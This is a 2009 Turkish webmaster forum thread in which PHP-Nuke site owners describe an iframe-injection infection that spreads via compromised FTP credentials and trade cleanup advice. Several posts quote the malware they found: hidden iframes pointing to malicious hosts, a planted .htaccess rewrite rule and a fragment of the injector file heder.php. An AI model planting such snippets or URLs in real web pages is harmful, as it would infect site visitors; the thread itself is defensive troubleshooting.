Yeni i f r a m e virüsler kodlarıda siliyor

mersoy · Mesaj: 1000+ Kayıt: Dec 08, 2007 Mesajlar: 2316

Yeni diyorum ama belkide ben yeni gördüm ve bir kaç gündür uğraştığım bir sorun.

Daha önce bulaşan i f r a m e virüsleri bul / değiştir program yardımları ile sistemden temizlemek kıolay oluyordu.

Bu seferki virüs daha iyi yazılmış. Bulaştığı index.php ve index.html gibi dosyaların ?> php kapama tagından önceki bir kaç satır kodu siliyor. Bu nedenle i f r a m e kodları temizlemek bir işie yaramıyor çünkü diğer kodlarımızda silinmiş olduğundan tüm dosyalar hatalı oluyor.

Yedeğimde olmadı için tek tek düzeltsemde bir yerlerde gizli olan kod ya da dosya sayesinde tekrar bulaşıyor (öyle tahmin ediyorum).

Diğer sitenin yedeği olduğu için kolay yırttım ama bu sefer faka bastık :S

Bu Site Google Adsense ile Gelir Elde Ediyor · Tarih: 2024-04-24, 12:44:42 Mesaj konusu: Forum Arası Reklamlar

muhammed-fatih · Mesaj: 200+ Kayıt: Nov 24, 2008 Mesajlar: 298

evet bir siteyi altı defa sildim tekrar kurdum yinede i f r a m e kodundan kurtulamadım index.html veya ıvır zıvır gibi dosyalara bulaşmıştı

genelde mainfile.php de ?> tagından sonra kendini atıyor headerin üstünde banner kadar alan açıyor asp yada php olarak fark etmiyor bir defa bilgisayarıma bulaşmış ftp den dosya yüklediğim bütün sitelere bulaşmış bir kaç defa buldum sildim ama fayda etmedi bilgisayara format atttım fdiks çaktim şimdi tekrar deneyecem eyer yine olmazsa Crying or Very sad

bi daha hiçbir siteye el sürmeyecem

bilgisayara format attım fdiks çektim yedekleri harici hdd ye aldım ve harici hdd yi siteler bitene kadar kullanmayacam :)

sql yi indirdim ama ne gariptirki içerisinde bu kodla karşılaştım Confused

[code]<i f r a m e src="http://mixgrouptravel.cn:8080/index.php" width=193 height=183 style="visibility: hidden"></i f r a m e># ========================================================[quote]

dmg · Mesaj: 50+ Kayıt: Apr 13, 2007 Mesajlar: 50

evet bu i f r a m e virüsleri çok tehlikeli gecenyıl bende karşılaştım, eski bir yedekle halletim, fakat şuan 2 arkadaşım var halen sitelerinde aylardır uğraşıyorlar bu durumla,

inşallah bi daha benim başıma gelmez Very Happy

karaca25 · Mesaj: 500+ Kayıt: Oct 02, 2007 Mesajlar: 717

aynı durum benimde başıma geldi avast sayesinde temizleyebilmiştim..ancak tek bir dosyada bile kalsa 2 saat içinde tamamen kaynıyor.Host şirketi sayesinde siteyi eski bir tarihe almıştım..

emrahtavsan · Mesaj: 100+ Kayıt: Sep 19, 2007 Mesajlar: 141

bunların bulaşmaması için neler yapılabilir ?

muhsin · Tarih: 2009-06-18, 17:52:47 Mesaj konusu:

Öncelikle siztenizin yedeğini bilgisayarınıza alın, sonra komple FTP de bulunan dosyalarınızı silin, hangi nuke sürümünü kullanıyorsanız, hostunuza gönderin.

Php nuke de olmayan ve kendi bilgisayarınıza indirdiğiniz yedeğin içinde bulunan modülleri blokları vs. vs. onları tek tek temizleyin ve hostunuza gönderin. Ama bitmedi.

cpanel ve ftp şifrelerinizi değiştirin
Prefix değiştirin
admin ve config dosyalarınızı gizleyin.

Sorunu aşmış olursunuz % 99 sonuş alırsınız

karaca25 · Mesaj: 500+ Kayıt: Oct 02, 2007 Mesajlar: 717

ben güvenlik sistemlerini kullanmama rağmen yinede bulaşmıştı..en sağlamı yedek almak ve sağlam bir antivirüs kullanmak gibi geliyor..

bybedircan · Tarih: 2009-06-18, 20:21:02 Mesaj konusu:

Kardeş en sağlamı yedeklerini alacaksın Very Happy

Bu Site Google Adsense ile Gelir Elde Ediyor · Tarih: 2024-04-24, 12:44:42 Mesaj konusu: Forum Arası Reklamlar

muhammed-fatih · Mesaj: 200+ Kayıt: Nov 24, 2008 Mesajlar: 298

Öylede ama bu virüslerin nasıl bulaştığını anlatabilecek bir arkadaş varmı en iyi hangi program yakalayabilir. nasıl bulaşır bilgisayarda kendini gizleyebilirmi ben mesela sadece bir dosya attım ftp ye ama 2 saat sonra baktım virüs bulaşmış bile acaba bilgisayardanmı bulaşıyor yada nasıl nerden bulaşıyor nasıl çoğalıyor diyorsunuzki ftp ve panel şifrelerinizi değişrin neden değişmeliyiz bu konuda daha ayrıntılı bir bilgi veren olabilirmi acaba ?

defalarca virüslü görünen siteyi indirdim değişik programlarla tarattım ama birşey bulamadım ...

lütfen bilgi olan paylaşabilirmi kolay gelsin

bybedircan · Tarih: 2009-06-18, 20:51:12 Mesaj konusu:

bulaşması genelikle, ftp atığımız ,yeni modül, block ve tema gibi dosyaların arasında , tabi onu taratmamız lazım, ve tabi sitede ki açıklıktan da bulaşır, yani zaten birinci sitem öyle mavf olmuştur, ben silmekten bıkmıştım o bıkamadı en sonunda ben pes ettim Very Happy

muhammed-fatih · Mesaj: 200+ Kayıt: Nov 24, 2008 Mesajlar: 298

valla bilmem pesmi etmek gerekir yada çabalamakmı gerekir ama ben artık phpnuke kullanamıyom kuruyorum aradan iki saat geçiyor birde bakıyom ne yukarda virüs var Very Happy

konuya çare bulmak gerekiyor bence hatta ilk önce burdan indirdiğim dosyalardan şüphelendim acaba burdaki dosyalardamı var diye Laughing

daha sonra öteki arakdaşların başınada geldiğini öğrenince sorunun kendimden olduğunu anladım ben tarattım nod32 ile ad aware se ile bir kaçtanede başka bulduğum programla ama birşey çıkmadı hele bakayım siteyi tekrar kurdum bir çözüm bulamazsam uğraşmayacam daha 2 satırlık kodla adamlar siteyi mahvediyorlar valla bilsem bu kodlar kimin hiç düşünmeden mahkemeye verirdim Mad

neyse çözüm bulanınız olursa burdan yazabilirmi

kolay gelsin

Style_53 · Mesaj: 300+ Kayıt: Nov 10, 2006 Mesajlar: 441 Konum: Rize

Arkadaşlar Sitenizin Muhakkak Bir Yedeğini Alın ve Rarlayıp Üstüne Birde rarladığınız Yedeğinize Şifre Koyup Cd Aktarın ve Saklayın. Allah Korusun O Virüsler Ftp Yoluyla Bilgisayarınıza Ulaşıp Tüm Yedeklerinize Bulaşabiliyor. Nitekim benim başıma Gelmişti.

Sercan · Tarih: 2009-06-19, 02:13:35 Mesaj konusu:

bana göre en dandik anti virüslerden biri avast çünkü herşeye virüs diyor :) Doğal olarak bu virüsü tek tanımlayan antivirüs programıdır.Şurada* yazdığım yazıda bu virüsten nasıl kurtulduğumu detaylı detaylı anlattım.Kısaca özet geçmek gerekirse i f r a m e olarak temizlemenin yanında %90 <? başlangıç kodunun bitişiğinde şifrelenmiş bir virüs eklenmiştir bunuda temizlemeniz gerekir.Ayrıca klasörlere images.php adında bir php dosyası atıp şifrelenmiş kodlarla bu dosyayı include ediyor ve virüsü temizlenmesi zor bir hale getiriyor.

mersoy · Mesaj: 1000+ Kayıt: Dec 08, 2007 Mesajlar: 2316

sizler yazdıklarımı tam anlayamadınız sanırım

Eğerki dosyaların belirli yerlerine virüs kodları bulaşmış olsaydı bunları temizlemek çok kolay olurdu.
Ben diyorumki index.* dosyalarının atıyorum alttan kod olan 5 satırını silmiş

bu durumda hiç bir şekilde temizleyemeyiz, sadece yedek atarak kurtarabiliriz. Ya da tüm virüs bulaşan dosyaları açıp temiz dosyalar ile karşılaştırıp silinen kodları eklemeliyiz.

karaca25 · Mesaj: 500+ Kayıt: Oct 02, 2007 Mesajlar: 717

en sağlıklısı 2 ayda bir ftp deki tüm dosyaları bir cd ye kopyalamak.biraz sıkıcı bir iş ama gerekli olanda bu

bybedircan · Tarih: 2009-06-19, 14:33:08 Mesaj konusu:

Anladık mersoy bey, bizde dedik tek çare, sürekli yeteklerimizi bulundurtmak Very Happy

Diyar36 · Mesaj: 200+ Kayıt: Jan 03, 2005 Mesajlar: 283

ilk defa karsilasiyoruz böyle birseyle bizden yok ama görundugu gini yapan yapmis bu virusu

rache · Tarih: 2009-06-19, 21:08:53 Mesaj konusu:

Asagidaki i f r a m e benim mainfile.php den cikti..orjinal mainfile.php 2905 satir..Bu i f r a m e 2473. satirdan sonrasini silmis..Aradaki fark 432 satir.......Ve bu i f r a m e diger index.php ve html uzantili dosyalarin hepsinde yerlesmis durmda...Yedeklerle isi yirttim ...

mekansizim · Mesaj: 200+ Kayıt: May 31, 2006 Mesajlar: 280

buna çare bulan varmı ?

mersoy · Mesaj: 1000+ Kayıt: Dec 08, 2007 Mesajlar: 2316

mekansizim · Mesaj: 200+ Kayıt: May 31, 2006 Mesajlar: 280

aynı bela benimde başıma geldi nerden geldi nasıl girdi anlamadım.
bir tane var .htc dosyasından atıyor birtanede sayılı php dosyası atıyor bi i f r a m e kodu var yerleşiyor kendinden öncesini siliyor. index home gibi dizinlere yapışıyor

doktoradil · Mesaj: 1+ Kayıt: Mar 19, 2005 Mesajlar: 33 Konum: ankara

Merhaba arkadaşlar
2 haftadır i f r a m e ile boğuşuyorum. dediğiniz gibi siliyorum 2 saat sonra her şey yeni baştan.Şimdi farklı bir yöntem uygulamay çalışıyorum. umarım başarırım.
1.önce bilgisayarımı formatladım. ftp olarak filezilla yı kurdum
2. virus programı olarak avast prof kurdum
3. advanced find ve replaace programını kurdum
Siteyi bir flash diske indirdim. zaten avast bir çok dosyada i f r a m e alarmı verdi onları sildim.sonra advanced find and replace ile flash diski taradım içinde i f r a m e kelimesi olan dosyaları ve kodlaraı buldum. normal kodlara dokunmadım ama diğerlerini yani virus olanları sildim. ama problem dediğiniz gibi dosyanın altına değil bir kısmı silip ekliyor. bu nedenle bir çok dosyada sorun çıktı.
Sitede 2 değişik şey gördüm
1. rot ta .htaccess dosyasının içine şu kod eklenmiş:
#mmmd
<IfModule>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?q=$1.$2 [NC,L]
</IfModule>

2. rot a heder.php diye bir dosya eklemiş. içindeki kod:
</s> 0)

return preg_replace("/(<body>)/i", "\\1".$frame_code, $data, 1);

else return $data.$frame_code;

}

ob_start('callback');

$file = $_GET['q'];
chdir(get_file_dir_($file));

include($file);

?>

Bence bu sadece bir virusun yaptığı şey değil gibi.

Ayrıca sadece index.php ve index.html değil bir çok dosya ya eklemiş kodu. eklediği kod:

<i f r a m e src="http://c9u.at:8080/ts/in.cgi?pepsi148" width=125 height=125 style="visibility: hidden"></i f r a m e>

Kısacası saçımı başımı yolar hale geldim. Farklı bir yöntem uygulamam gerekiyorsa lütfen yardımcı olun.
Teşekkürler

emrahtavsan · Mesaj: 100+ Kayıt: Sep 19, 2007 Mesajlar: 141

arkadaslar ben temizledim

Şunları uyguladım:

1- Bilgisayarımı Formatladım c-d-e-f kısacası tüm hdd yi sildim
2- Kurulum tamamlandıktan sora ilk işim nod 32 ve avats prof kurdum
3- filezilla kurdum ve ftp ye den dosyaları çektim temizledim
4- temiz dosyaları ftp ye yüklemeden önce ftp ve panel şifrelerini degiştirdim
5- yeni kullanıcı adı ve şifremle ftp ye temiz dosyaları yükledim ve sorunsuz çalışıyor :) tabi silinen kodların telefisini yaptıktan sora sorunsuz...

Not: fotmat attıktan sora kesinlikle sitenize girmeyin virüs tekrar bulaşabilir. temiz dosyları yükledikten sonra sitenizi kontrol edebilirsiniz... virüs kodu içindeki http://9uc. cn/8080 gibi site adreslerini exporlerden yasaklayınki o siteye erişim olmasın ve virüs tekrar bulaşamasın

Kolay Gelsin ....

medo03 · Tarih: 2009-08-22, 23:51:38 Mesaj konusu:

Bu virüsler hakkaten acayip valla benim 3 siteye bulaştı hala uğraşıyorum bitiremedim nasıl bulaştı anlamadım pc yi yeni formatlamıştım ve kaspersky kullanıyodum nasıl bulaştı hala anlamış değilim :S:S:S